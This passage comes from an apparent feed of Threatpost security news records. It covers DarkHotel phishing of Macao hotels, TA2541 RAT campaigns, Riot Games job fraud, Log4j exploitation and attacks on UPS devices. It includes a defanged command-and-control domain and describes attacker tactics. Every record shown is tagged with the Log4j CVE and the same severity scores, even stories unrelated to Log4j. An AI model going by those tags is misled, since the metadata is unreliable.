group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. 
\u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks **\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.\u2019\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade & Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign **\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. 
In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:44", "description": "Researchers have identified an advanced persistent threat (APT) group responsible for a series of cyberespionage and spyware attacks against the aviation, aerospace, transportation and defense industries since at least 2017 that feature high-volume email campaigns using industry-specific lures.\n\nThe group, which researchers have dubbed TA2541, typically sends hundreds of thousands of malicious messages \u2013 nearly always in English \u2013 that ultimately deliver a remote-access trojan (RAT) payload using commodity malware to collect data from victims\u2019 machines and networks, according to [a new report](<https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight>) by Proofpoint released Tuesday. 
These campaigns have affected hundreds of organizations across the world, with recurring targets in North America, Europe and the Middle East, researchers said.\n\nThough a number of the group\u2019s attacks already have been tracked by various researchers \u2013 including [Microsoft](<https://twitter.com/MsftSecIntel/status/1392219299696152578>), [Mandiant](<https://www.mandiant.com/resources/dissecting-netwire-phishing-campaigns-usage-process-hollowing>), [Cisco Talos](<https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html>), [Morphisec](<https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader>) and others \u2013 since at least 2019, Proofpoint\u2019s latest research shares \u201ccomprehensive details linking public and private data under one threat activity cluster we call TA2541,\u201d researchers wrote.\n\nIndeed, previously reported attacks related to TA2541 include [a two-year spyware campaign](<https://threatpost.com/airline-credential-theft-campaign/174264/>) against the aviation industry using the AsyncRAT called Operation Layover and uncovered by Cisco Talos last September, and a [cyberespionage campaign](<blank>) against aviation targets spreading RevengeRAT or AsyncRAT revealed by Microsoft last May, among others.\n\n## **Five Years and Still Flying High**\n\nProofpoint first started tracking the actor in 2017 when its tactic of choice was to send messages with \u201cmacro-laden Microsoft Word attachments\u201d that downloaded RAT payloads. 
The group has since tweaked this tactic and now most frequently sends messages with links to cloud services such as Google Drive or OneDrive hosting the payload, according to the report.\n\nHowever, although the approach to how they hide their malicious payload has varied, the group has mostly remained consistent in its choice of targets, lures and the type of payloads it uses, observed Sherrod DeGrippo, vice president of Threat Research & Detection at Proofpoint.\n\n\u201cWhat\u2019s noteworthy about TA2541 is how little they\u2019ve changed their approach to cybercrime over the past five years, repeatedly using the same themes, often related to aviation, aerospace, and transportation, to distribute remote access trojans,\u201d she said in an email to Threatpost. \u201cThis group is a persistent threat to targets throughout the transportation, logistics, and travel industries.\u201d\n\nIn terms of which specific RATs are used, attackers tap a variety of low-hanging fruit \u2013 that is, commodity malware that\u2019s available for purchase on criminal forums or available in open-source repositories. 
Currently, TA2541 prefers to drop AsyncRAT on victims\u2019 machines but also is known to use NetWire, WSH RAT and Parallax, researchers said.\n\nSo far, all of the malware distributed by the group has been aimed at information-gathering purposes and to gain remote control of an infected machine, with researchers acknowledging that they don\u2019t know the threat actor\u2019s \u201cultimate goals and objectives\u201d beyond this initial compromise, they said.\n\n## **Typical Malicious Emails**\n\nA typical malicious message in a TA2541 campaign uses a lure related to some type of logistical or transportation theme related to one of the particular industries it\u2019s targeting, researchers said.\n\n\u201cIn nearly all observed campaigns, TA2541 uses lure themes that include transportation-related terms such as flight, aircraft, fuel, yacht, charter, etc.,\u201d according to the report.\n\nFor example, researchers revealed an email that impersonated an aviation company requesting information on aircraft parts, as well as another that requested info on how to transport a medical patient on a stretcher on an ambulatory flight.\n\nOnce the COVID-19 pandemic hit in March 2020, the group shifted bait tactics slightly and \u2013 like [many other threat actors](<https://threatpost.com/spearphishing-campaign-exploits-covid-19-to-spread-lokibot-infostealer/154432/>) \u2013 adopted [COVID-related lures](<https://threatpost.com/top-email-protections-fail-covid-19-phishing/154329/>) consistent with their overall theme of cargo and flight details, researchers noted.\n\n\u201cFor example, they distributed lures associated with cargo shipments of personal protective equipment (PPE) or COVID-19 testing kits,\u201d researchers noted.\n\nHowever, this shift was short-lived, and TA2541 rather quickly returned to its more generic, transportation-related email themes, they added.\n\n## **Current Attack Vector**\n\nIn current campaigns observed by Proofpoint, if victims take the bait, 
they will usually be directed to click on a Google Drive URL that leads to an obfuscated Visual Basic Script (VBS) file, researchers said.\n\n\u201cIf executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub,\u201d researchers wrote. \u201cThe threat actor executes PowerShell into various Windows processes and queries Windows Management Instrumentation (WMI) for security products such as antivirus and firewall software, and attempts to disable built-in security protections.\u201d\n\nIn this way, TA2541 collects system information before then downloading the RAT on the host machine, according to the report.\n\nGoogle Drive has been a consistent tool of the threat group, but occasionally TA2541 also will use OneDrive to host the malicious VBS files, researchers said. In late 2021, Proofpoint also observed the group using DiscordApp URLs that link to a compressed file that led to either AgentTesla or Imminent Monitor as an attack vector, researchers said. Indeed, the Discord content delivery network (CDN) has been [an increasingly popular way](<https://threatpost.com/attackers-discord-slack-malware/165295/>) for threat actors to use a legitimate and popular app for nefarious purposes.\n\nOccasionally TA2541 also will use email attachments instead of cloud-based service links, including compressed executables such as RAR attachments with an embedded executable containing a URL to CDNs hosting the malware payload, they added.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. 
Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T14:02:07", "type": "threatpost", "title": "TA2541: APT Has Been Shooting RATs at Aviation for Years", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T14:02:07", "id": "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "href": "https://threatpost.com/ta2541-apt-rats-aviation/178422/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers 
with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. 
\u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019 **\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to elicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the so-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to 
work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": 
"https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T04:10:46", "description": "Call it a \u201clogjam\u201d of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies\u2019 telemetry using at least 70 distinct malware families \u2014 and the fallout from the Log4j vulnerability is just beginning.\n\nResearchers manning keyboards all over the world have spent the past several days chasing [attacks aimed at a now-infamous Log4j](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) Java library bug, dubbed [Log4Shell (CVE-2021-44228).](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) Side note: Log4j is pronounced, \u201clog forge\u201d \u2014 although that\u2019s disputed, because it\u2019s also referred to in conversation as \u201clog-four-jay.\u201d Dealer\u2019s choice there.\n\nFirst discovered among Minecraft players last week, the newly discovered vulnerability has opened a massive opportunity for threat actors to hijack servers, mostly with coin miners and botnets, but also a cornucopia of other malware such as the [StealthLoader trojan](<https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/>) \u2014 and that\u2019s just so far.\n\n\u201cWe\u2019ve seen a lot of chatter on Dark Web forums, including sharing scanners, bypasses and exploits,\u201d Erick Galinkin, an artificial intelligence researcher at Rapid7, told Threatpost. 
\u201cAt this point, more than 70 distinct malware families have been identified by us and other security researchers.\u201d\n\nFor instance, Bitdefender researchers this week [discovered](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) that threat actors are attempting to exploit Log4Shell to deliver a new ransomware called Khonsari to Windows machines.\n\nCheck Point research reported Wednesday that since last Friday, its team has detected 1.8 million Log4j [exploit attempts](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on almost half of all corporate networks that they track.\n\nThese threat actors aren\u2019t low-skilled hobbyists. Check Point added that as of Wednesday, Iranian hacking group Charming Kitten, also known as APT 35 and widely believed to be working as a [nation-state actor](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>), is actively targeting seven specific Israeli organizations across the government and business sectors.\n\n\u201cOur reports of the last 48 hours prove that both criminal-hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors\u2019 operations are to be revealed in the coming days,\u201d Check Point added.\n\nMicrosoft meanwhile reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey are actively exploiting Log4Shell (CVE-2021-44228) in targeted attacks. 
Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\n\u201cThis activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment and exploitation against targets to achieve the actor\u2019s objectives,\u201d the company said in [a posting](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>).\n\n## **Is a Log4j Worm Next? **\n\nResearcher Greg Linares meanwhile has reported seeing evidence that a self-propagating worm is being developed and will likely emerge in a day or less.\n\n> [#Log4J](<https://twitter.com/hashtag/Log4J?src=hash&ref_src=twsrc%5Etfw>) based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.\n> \n> Self propagating with the ability to stand up a self hosted server on compromised endpoints.\n> \n> In addition to spraying traffic, dropping files, it will have c2c\n> \n> \u2014 Greg Linares (@Laughing_Mantis) [December 12, 2021](<https://twitter.com/Laughing_Mantis/status/1470165580736987137?ref_src=twsrc%5Etfw>)\n\nThere is wide agreement within the cybersecurity community that he\u2019s correct, but many experts don\u2019t think the fallout will be as bad with Log4j as it was with past incidents like [WannaCry or NotPetya](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\n\u201cWhile it\u2019s possible that we could see a worm developed to spread among susceptible Log4j devices, there hasn\u2019t been any evidence to suggest this is a priority for threat actors at this time,\u201d Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, told Threatpost. 
\u201cDeveloping malware of this nature takes a significant amount of time and effort.\u201d\n\n\u201cThis activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue,\u201d Morgan added.\n\n\u201cIt\u2019s still very much early days with regards to Log4j,\u201d Morgan said. \u201cWhile many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm.\u201d\n\nThe emergence of a Log4j worm isn\u2019t the worst-case scenario, researchers like Yaniv Balmas from Salt Security explained to Threatpost.\n\n\u201cWhile not neglecting the impact of such a worm, that might not be the worst scenario because of the unbelievable easiness that this attack can be applied,\u201d Balmas said. \u201cEveryone with a basic computer and internet access could launch an attack against millions of online services within minutes. 
This achieves quite a similar impact as a worm \u2013 it is distributed and unpredictable, and the damage extent might even be higher than a worm since a worm works \u2018blindly\u2019 in an automated manner.\u201d\n\nHe added, \u201cin this other scenario, there are actual humans behind the attacks which may target specific entities or institutions and enable attackers to fine-tune their attacks as they progress.\u201d\n\nThe tireless work being done by security teams to [patch up Log4j against exploits](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) is a big help against the development of any worms on the horizon, John Bambenek, principal threat hunter at Netenrich, told Threatpost.\n\n\u201cThis vulnerability certainly looks wormable, however, the good news is we\u2019ve already had almost a week to start dealing with detection, mitigation [and patching](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>),\u201d Bambenek said. \u201cThere will be lots of vulnerable machines out there, but by now a good deal of the vulnerable machines have been handled and many more are protected with web application firewall (WAF) rules (for instance, Cloudflare deployed protection over the weekend). The worst case would have been a worm last week, we\u2019re in a better place now.\u201d\n\n## **Log4j\u2019s Long Tail**\n\nBeyond emergency patching measures, Galinkin explained to Threatpost that his concern is with lingering unpatched devices and systems that will be vulnerable long after Log4j has fallen out of the headlines, particularly in sectors like academia and healthcare.\n\n\u201cOne crucial thing to note about this vulnerability is that it\u2019s going to have an extremely long tail,\u201d he said. 
\u201cHospitals tend to purchase software once, but sometimes the vendors become defunct \u2014 leading to unsupported software that will never receive a patch.\u201d\n\nHe added, \u201cin academia, loads of software is written once by grad students or professors, but those individuals may not be aware of the bug, or they simply no longer maintain the software \u2014 software that is in use in physics, pharmacology and bioinformatics. This suggests that we will continue to see exploitation of this vulnerability \u2014 potentially in isolated incidents \u2014 long into the future.\u201d\n\n121621 16:21 UPDATE: Corrected spelling of John Bambenek\u2019s name.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T23:18:44", "type": "threatpost", "title": "Relentless Log4j Attacks Include State Actors, Possible Worm", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-44228"], "modified": "2021-12-15T23:18:44", "id": "THREATPOST:5CCE0C2607242B16B2880B331167526C", "href": "https://threatpost.com/log4j-attacks-state-actors-worm/177088/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:33:05", "description": "Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT equipment, so the stakes are high.\n\nThat\u2019s according to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy, which warned that malicious types are going after internet-connected versions of UPS via default usernames and passwords, mostly \u2013 though vulnerabilities, like the [TLStorm bugs disclosed earlier this month](<https://threatpost.com/zero-click-flaws-ups-critical-infratructure/178810/>) \u2013 are also in the attacker toolbox.\n\n\u201cIn recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,\u201d according to a [Tuesday alert](<https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf>) from CISA (PDF). \u201cLoads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).\u201d\n\nIf attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company\u2019s internal network and steal data. 
Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.\n\nFurther, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).\n\n\u201cIt\u2019s easy to forget that every device connected to the internet is at increased risk of attack,\u201d Tim Erlin, vice president of strategy at Tripwire, noted via email. \u201cJust because a vendor provides the capability to put a device on the internet, doesn\u2019t mean that it\u2019s set up to be secure. It\u2019s up to each organization to ensure that the systems they deploy are configured securely.\u201d\n\n## **An Easy Fix**\n\nThus, those responsible for UPS upkeep (which CISA noted could include IT staff, building operations people, industrial maintenance workers or third-party contractors from monitoring services) have an easy fix for this one: Enumerating all connected UPSs and similar systems and simply take them offline.\n\nIf maintaining an active IoT connection is a requirement, admins should change the default credentials to a strong user-name-and-password combo \u2013 and preferably, implement multifactor authentication (MFA) too, CISA added. And other mitigations, according to CISA, include ensuring UPSs are behind a virtual private network (VPN), and adopting login timeout/lockout features so that the devices aren\u2019t continually online and open to the world.\n\n\u201cThe use of a default username and password to maliciously access a system isn\u2019t a new technique,\u201d said Erlin. \u201cIf you\u2019re responding to this advisory by updating the credentials for your UPS systems, take the follow-up step to ensure that other systems aren\u2019t using default credentials as well.\u201d\n\n_**Moving to the cloud? 
